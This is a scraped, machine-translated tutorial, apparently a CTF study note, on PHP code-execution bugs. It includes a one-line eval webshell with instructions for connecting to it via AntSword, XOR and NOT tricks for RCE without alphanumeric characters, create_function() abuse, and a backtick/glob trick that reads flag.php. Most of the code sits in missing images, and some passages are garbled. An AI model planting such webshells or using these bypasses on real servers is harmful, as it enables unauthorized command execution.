当前位置：网站首页>Code Execution Vulnerability - no alphanumeric rce create_ function()

Code Execution Vulnerability - no alphanumeric rce create_ function()

2022-07-04 02:52:00 【qq_ fifty-one million five hundred and fifty thousand seven hun】

Code Execution Vulnerability

eval() function

<?php eval($_POST[0]);?>

eval The received string will be treated as PHP Code to execute （ In a word, Trojans ）

Use this to connect the ant sword , The connection password is the value in brackets –$_POST[0] This is it in ‘0’ As the connection password

No alphanumeric RCE

Harsh RCE

Take the opposite 、 Exclusive or How to get around

Take the following example ：
Insert picture description here
Exclusive or method ：
XOR.php

Execution is terminal php XOR.php
utilize PHP7 Characteristics of — Dynamic function execution calls ：
Insert picture description here
If it is system(ls)— Once it was system Once it was ls
Empathy ：

The reverse method ：
qufan.php

hackbar in ：

create_function()

create_function() Function has two arguments $a r g s and$ code, Used to create a lambda Function of style

Insert picture description here

create_function() It has been gradually eliminated

PS

Filter length , Brackets ... When there are so many things , You can try ：
Insert picture description here
?> Achieve closure

<? yes PHP The short tag of <?= Express <? echo for example ![ Insert picture description here ](https://img-blog.csdnimg.cn/4e224060dc094c66974ed2f97fc8bdee.png) It means output abc And then look at ： `` A pair of backquotes is shell_exec Execute system commands %20 amount to Space The system command executed is equivalent to ： **/???/??? *** In fact, that is /bin/cat One star behind and * Namely flag.php